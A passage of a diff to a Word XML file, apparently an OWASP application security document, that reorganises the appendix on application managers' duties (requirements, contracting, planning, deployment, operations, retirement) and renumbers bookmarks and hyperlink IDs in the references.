-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>How many apps have never been tested? Do they contain any sensitive data assets?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Tracking if testing is overdue or required for regulatory compliance reasons, such as PCI ASV scans or privacy impact assessments</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>There are many forms of metrics that can be found. Be careful of metrics that don't align business and security, but instead aim to reduce costs - such as cost per bug. At a certain point, KPIs need to be aligned with enabling secure business, not cost reductions.</w:t>
+        <w:t>We suggest establishing application managers and or application owners for every application. The application manager is the technical counterpart of the application owner from business perspective and manages the full application lifecycle, including the security of an application, associate data assets, and documentation. Application managers work together with the organization's security specialists.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13949,35 +13999,53 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="this-is-just-the-start"/>
-      <w:bookmarkEnd w:id="126"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>This is just the start</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Starting the application security journey can feel overwhelming. A key takeaway is that you can't review your way to building a bridge; at some point you must build it. Let's ensure that security is deeply esconced within the organization, and aligned with organizational objectives.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="__RefHeading___Toc2402_1944273953"/>
-      <w:bookmarkStart w:id="128" w:name="a-whats-next-for-application-managers"/>
-      <w:bookmarkEnd w:id="127"/>
-      <w:bookmarkEnd w:id="128"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>+A: What's next for Application Managers</w:t>
+      <w:bookmarkStart w:id="129" w:name="requirements-and-resource-management"/>
+      <w:bookmarkEnd w:id="129"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Requirements and Resource Management</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="68"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="68"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Compile the technical requirements including functional and non functional security requirements</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="68"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13985,96 +14053,10 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="manage-the-full-application-lifecycle"/>
-      <w:bookmarkEnd w:id="129"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Manage the full Application Lifecycle</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>We suggest establishing application managers and or application owners for every application. The application manager is the technical counterpart of the application owner from business perspective and manages the full application lifecycle, including the security of an application, associate data assets, and documentation. Application managers work together with the organization's security specialists.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="requirements-and-resource-management"/>
+      <w:bookmarkStart w:id="130" w:name="request-for-proposals-rfp-and-contracting"/>
       <w:bookmarkEnd w:id="130"/>
       <w:r>
         <w:rPr/>
-        <w:t>Requirements and Resource Management</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="68"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="68"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Compile the technical requirements including functional and non functional security requirements</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="68"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="request-for-proposals-rfp-and-contracting"/>
-      <w:bookmarkEnd w:id="131"/>
-      <w:r>
-        <w:rPr/>
         <w:t>Request for Proposals (RFP) and Contracting</w:t>
       </w:r>
     </w:p>
@@ -14133,7 +14115,7 @@
         <w:rPr/>
         <w:t xml:space="preserve">Consider to use templates and checklists, such as </w:t>
       </w:r>
-      <w:hyperlink r:id="rId127">
+      <w:hyperlink r:id="rId126">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14167,53 +14149,75 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="132" w:name="planning-and-design"/>
+      <w:bookmarkStart w:id="131" w:name="planning-and-design"/>
+      <w:bookmarkEnd w:id="131"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Planning and Design</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="70"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="70"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Compile a security concept (e.g. architecture, measures) according the protection needs and the planned environmental security level. This should be supported by security specialists. Get the application owner to assume remaining risks or to provide additional resources.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="70"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Plan the quality gates for the development including security gates</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="132" w:name="development"/>
       <w:bookmarkEnd w:id="132"/>
       <w:r>
         <w:rPr/>
-        <w:t>Planning and Design</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Compile a security concept (e.g. architecture, measures) according the protection needs and the planned environmental security level. This should be supported by security specialists. Get the application owner to assume remaining risks or to provide additional resources.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Plan the quality gates for the development including security gates</w:t>
+        <w:t>Development</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Please review the +D "What's next for developers" for guidance.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14221,11 +14225,243 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="133" w:name="development"/>
+      <w:bookmarkStart w:id="133" w:name="deployment-testing-and-rollout"/>
       <w:bookmarkEnd w:id="133"/>
       <w:r>
         <w:rPr/>
-        <w:t>Development</w:t>
+        <w:t>Deployment, Testing and Rollout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>It's critical that security tasks automated the secure setup of the application, interfaces and of all further components needed, including required authorizations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Test the technical functions and integration to the IT architecture, coordinate business tests. Consider to test use and abuse cases from technical and business perspectives.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Put the application in operation and migrate form previously used applications</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Finalize all documentation, including the CMDB and security architecture.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="134" w:name="operating-and-changes"/>
+      <w:bookmarkEnd w:id="134"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Operating and Changes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Operating including the security management for the application (e.g. patch management)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Regularly report all users and authorizations to the application owner and get them acknowledged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Raise the security awareness of users and manage conflicts about usability vs security</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Update all documentation, including in CMDB and the security concept.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="135" w:name="retiring-systems"/>
+      <w:bookmarkEnd w:id="135"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Retiring systems</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Regard any requirements for archiving data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Securely close down the application, incl. delete unused accounts and authorization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Set your application’s state to retired in the CMDB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="136" w:name="__RefHeading___Toc2393_410054668"/>
+      <w:bookmarkStart w:id="137" w:name="references-10"/>
+      <w:bookmarkEnd w:id="136"/>
+      <w:bookmarkEnd w:id="137"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="138" w:name="owasp-flagship-projects-documents"/>
+      <w:bookmarkEnd w:id="138"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>OWASP Flagship Projects (Documents)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14235,260 +14471,6 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Please review the +D "What's next for developers" for guidance.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="deployment-testing-and-rollout"/>
-      <w:bookmarkEnd w:id="134"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Deployment, Testing and Rollout</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>It's critical that security tasks automated the secure setup of the application, interfaces and of all further components needed, including required authorizations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Test the technical functions and integration to the IT architecture, coordinate business tests. Consider to test use and abuse cases from technical and business perspectives.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Put the application in operation and migrate form previously used applications</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Finalize all documentation, including the CMDB and security architecture.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="135" w:name="operating-and-changes"/>
-      <w:bookmarkEnd w:id="135"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Operating and Changes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Operating including the security management for the application (e.g. patch management)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Regularly report all users and authorizations to the application owner and get them acknowledged</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Raise the security awareness of users and manage conflicts about usability vs security</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Update all documentation, including in CMDB and the security concept.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="136" w:name="retiring-systems"/>
-      <w:bookmarkEnd w:id="136"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Retiring systems</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Regard any requirements for archiving data</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Securely close down the application, incl. delete unused accounts and authorization</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Set your application’s state to retired in the CMDB</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="137" w:name="__RefHeading___Toc2404_1944273953"/>
-      <w:bookmarkStart w:id="138" w:name="references-10"/>
-      <w:bookmarkEnd w:id="137"/>
-      <w:bookmarkEnd w:id="138"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="139" w:name="owasp-flagship-projects-documents"/>
-      <w:bookmarkEnd w:id="139"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>OWASP Flagship Projects (Documents)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
         <w:t>The following OWASP Flagship documentation projects are most likely to be useful to users/adopters of this standard:</w:t>
       </w:r>
     </w:p>
@@ -14501,7 +14483,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId128">
+      <w:hyperlink r:id="rId127">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14519,7 +14501,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId129">
+      <w:hyperlink r:id="rId128">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14537,7 +14519,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId130">
+      <w:hyperlink r:id="rId129">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14555,7 +14537,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId131">
+      <w:hyperlink r:id="rId130">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14573,7 +14555,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId132">
+      <w:hyperlink r:id="rId131">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14591,7 +14573,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId133">
+      <w:hyperlink r:id="rId132">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14609,7 +14591,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId134">
+      <w:hyperlink r:id="rId133">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14623,8 +14605,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="140" w:name="owasp-flagship-projects-tools"/>
-      <w:bookmarkEnd w:id="140"/>
+      <w:bookmarkStart w:id="139" w:name="owasp-flagship-projects-tools"/>
+      <w:bookmarkEnd w:id="139"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP Flagship Projects (Tools)</w:t>
@@ -14649,7 +14631,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId135">
+      <w:hyperlink r:id="rId134">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14667,7 +14649,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId136">
+      <w:hyperlink r:id="rId135">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14685,7 +14667,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId137">
+      <w:hyperlink r:id="rId136">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14703,7 +14685,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId138">
+      <w:hyperlink r:id="rId137">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14721,7 +14703,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId139">
+      <w:hyperlink r:id="rId138">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14735,8 +14717,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="141" w:name="owasp-lab-projects"/>
-      <w:bookmarkEnd w:id="141"/>
+      <w:bookmarkStart w:id="140" w:name="owasp-lab-projects"/>
+      <w:bookmarkEnd w:id="140"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP Lab Projects</w:t>
@@ -14761,7 +14743,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId140">
+      <w:hyperlink r:id="rId139">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14779,7 +14761,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId141">
+      <w:hyperlink r:id="rId140">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14797,7 +14779,7 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId142">
+      <w:hyperlink r:id="rId141">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14815,7 +14797,7 @@
         <w:rPr/>
         <w:t xml:space="preserve">For a full list of projects, please see </w:t>
       </w:r>
-      <w:hyperlink r:id="rId143">
+      <w:hyperlink r:id="rId142">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -14829,8 +14811,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="142" w:name="external-references"/>
-      <w:bookmarkEnd w:id="142"/>
+      <w:bookmarkStart w:id="141" w:name="external-references"/>
+      <w:bookmarkEnd w:id="141"/>
       <w:r>
         <w:rPr/>
         <w:t>External references</w:t>
@@ -14855,16 +14837,30 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>[MITRE Common Weakness Enumeration - [</w:t>
-      </w:r>
+      <w:hyperlink r:id="rId143">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
